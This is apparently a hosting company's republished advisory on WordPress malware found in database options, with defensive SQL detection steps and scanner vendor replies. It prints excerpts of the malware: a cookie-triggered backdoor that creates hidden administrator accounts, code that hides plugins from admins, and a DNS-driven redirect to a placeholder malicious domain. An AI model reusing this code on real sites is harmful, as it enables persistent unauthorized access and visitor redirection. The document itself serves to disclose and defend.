New Malware Found in WordPress Installations: Hidden Admin Users, Redirects, and Plugin Hiding (Not Detected by 14 Major Scanners)

I’ve come across a new type of malware that has infected several of our test WordPress installations, and what’s concerning is that none of the security scanners we used, including Wordfence, GOTMLS.NET, and about 12 others, were able to detect it. We tried all major tools, but none flagged this threat. It’s well hidden in the database, specifically in entries such as wpcode_snippets, siteurl, home, and redirection_options, and it uses advanced techniques to hide from both admins and security plugins.

The websites were compromised due to a weak password, not because of any security vulnerabilities in the plugins. They were all development websites under a test subdomain without indexing.

Here are some of the scanners we used that failed to detect the malware:

• Wordfence
• Sucuri SiteCheck
• MalCare
• iThemes Security
• All In One WP Security & Firewall
• WPScan
• Anti-Malware Security (by Eli/GOTMLS.NET)
• SecuPress
• Quttera Web Malware Scanner
• Exploit Scanner
• WPCore Scan
• WP Cerber Security
• ClamAV

Despite using this wide range of scanners, none were able to identify the malicious code injected into the database. I’m sharing this here to alert the community and to see if anyone has encountered a similar issue or has insights on how to combat it.

Admin Panel Hijacking

The malware modifies the admin interface by hiding specific security-related plugins (like “Code Snippets”) and preventing the admin from reviewing compromised plugins and critical notifications.

Here’s a code snippet used to hide plugins:

if (current_user_can('administrator') && !array_key_exists('show_all', $_GET)) {
    add_action('admin_print_scripts', function () {
        echo '<style>';
        echo '#toplevel_page_wpcode { display: none; }';
        echo '#wp-admin-bar-wpcode-admin-bar-info { display: none; }';
        echo '#wpcode-notice-global-review_request { display: none; }';
        echo '</style>';
    });

    add_filter('all_plugins', function ($plugins) {
        unset($plugins['insert-headers-and-footers/ihaf.php']);
        return $plugins;
    });
}

Creation of Hidden Admin Users

The malware reads cookie data to insert admin credentials into the database and creates hidden admin users, unknown to the actual site owner.

Here’s an example of the code that creates hidden admin users:

if (!empty($_pwsa) && _gcookie('pw') === $_pwsa) {
    switch (_gcookie('c')) {
        case 'au':
            $u = _gcookie('u');
            $p = _gcookie('p');
            $e = _gcookie('e');
            if ($u && $p && $e && !username_exists($u)) {
                $user_id = wp_create_user($u, $p, $e);
                $user = new WP_User($user_id);
                $user->set_role('administrator');
            }
            break;
    }
}

Redirection of Non-Logged-In Users

Non-logged-in users or visitors with certain IP addresses are redirected to malicious external URLs using DNS records.

Here’s the redirect code:

function _red() {
    if (is_user_logged_in()) {
        return;
    }

    $ip = _user_ip();
    if (!$ip) {
        return;
    }

    $req = 'malicious-domain.com'; // Example of malicious domain being resolved
    $s = dns_get_record($req, DNS_TXT);
    if (is_array($s) && !empty($s)) {
        $redirect_url = base64_decode($s[0]['txt']);
        if (substr($redirect_url, 0, 4) === 'http') {
            wp_redirect($redirect_url);
            exit;
        }
    }
}

IP and Session Tracking

The malware tracks IP addresses to avoid redirecting the same IP multiple times in a 24-hour period.

How We Found It

The malware was hidden in the wp_options table, affecting entries like wpcode_snippets, siteurl, home, and redirection_options. It wasn’t detected by popular security plugins, including Wordfence.

We ran the following SQL query across all installations to identify suspicious patterns:

SQL Query to Detect Suspicious Entries:

SELECT option_name, option_value
FROM wp_options
WHERE option_name IN ('siteurl', 'home', 'wpcode_snippets', 'wpseo', 'redirection_options')
AND (option_value LIKE '%<script%'
OR option_value LIKE '%eval%'
OR option_value LIKE '%base64_decode%'
OR option_value LIKE '%document.write%');

Observed Effects:

• Non-logged-in users or visitors from unknown IPs are redirected to malicious sites.
• Hidden admin users are created without the site owner’s knowledge.
• Security plugins and important notifications are hidden from the admin panel.

What You Should Know:

This malware injects itself into database options like wpcode_snippets and siteurl, making it hard to detect via traditional scans. Existing WordPress security plugins, including Wordfence, did not detect this malware.

What Can Be Done:

If you manage WordPress sites, I highly recommend checking your wp_options table for any suspicious values using the SQL query above. If anyone from the WordPress security community or plugin developers has encountered similar issues, I would love to collaborate on identifying how this malware propagates and how we can stop it.

Feel free to reach out if you need more details or want to review the code in depth. I’ve attached the full script of the malicious code I found injected as a value in the database under a wpcode_snippets entry inside the wp_options table.

Be aware, the code contained in the file below is malware. Please do not install or copy this code in your environment for any reason.

Malware Script Sample

Update 1:

I’ve written a script that temporarily helps to identify suspicious database entries related to this malware across multiple WordPress installations. The script scans through the directories where your WordPress installations are located, checks the wp-config.php file for database credentials, and then searches the database for signs of malicious code, particularly in the wp_options table.

How to Use the scanner.php Script:

1. Download the script: You can download the script from the link I’ve shared, or you can copy the code below.
2. Upload the script: Place the script (called scanner.php) in the root folder where your WordPress installations are located, for example: /home/youruser/public_html/.
3. Run the script: SSH into your server and run the script with the following command: php /path/to/scanner.php The script will log any suspicious entries found in the wp_options table of the database, printing details about the suspicious option_name and the first 300 characters of its option_value.

Note: This script is a SCANNER. It will not clean your database nor remove the malware; it just tells you if and where the malware is nested.

If the results are suspicious, check the tables listed by the scanner, and remove the malicious script. If necessary, delete the entire database entry that embedded the malware script.

4. Reset all your credentials to ensure there are no compromised accounts: This includes:
   • WordPress admin passwords.
   • Database credentials (DB username and password).
   • FTP or SFTP credentials.
   • Hosting control panel passwords.
   • API keys or any third-party integration credentials.
5. Remove the script after use: Once the scan is complete, make sure to delete the scanner.php file from your public folder to avoid exposing it to potential attackers.

This is a temporary solution that should help you identify any infections while we wait for this malware to be incorporated into the official security tools.

Scanner file (PHP)

Stay safe, and thanks for your attention!

Update 2:

Eli from GOTMLS.NET and Julio from SECUPRESS.ME replied:

Full conversation here: WordPress.org Support

TL;DR

I’ve received some helpful feedback from the developers behind SecuPress and GOTMLS regarding this malware:

Julio from SecuPress: SecuPress is aware of this type of malware and has been working on improving their defenses. They’ve already developed methods to prevent hidden admin users from being inserted, whether via wp_insert_user(), custom $wpdb queries, or direct database injections. They’ve also found a way to always display hidden plugins on the admin plugins page and improved their MalwareDB Scanner to detect this type of malicious code. In the upcoming beta release (expected this month), these improvements will be implemented, and Julio has kindly offered for me to test this version early. Additionally, they’ve flagged the custom-css-js CPT slug as another potential location for injected redirect scripts.

Eli from GOTMLS: Eli mentioned that he has seen similar threats where the WPCode Lite plugin is installed, and malicious code snippets are injected into the database to hide from the WordPress admin area. He confirmed that different sites were compromised using a mix of brute force attacks and unpatched plugin vulnerabilities. Eli also confirmed that this malware variant was added to his GOTMLS definitions on the 7th of last month, but he’s unsure why it wasn’t detected on my site, despite having the latest definitions. He has asked for me to send him the exact code found in my database for further investigation.

Copyrights:

This bug was originally reported and postedby NonSonoKoreano on Reddit.

Compiled for Usijali Hosting Customers

www.usijalihosting.com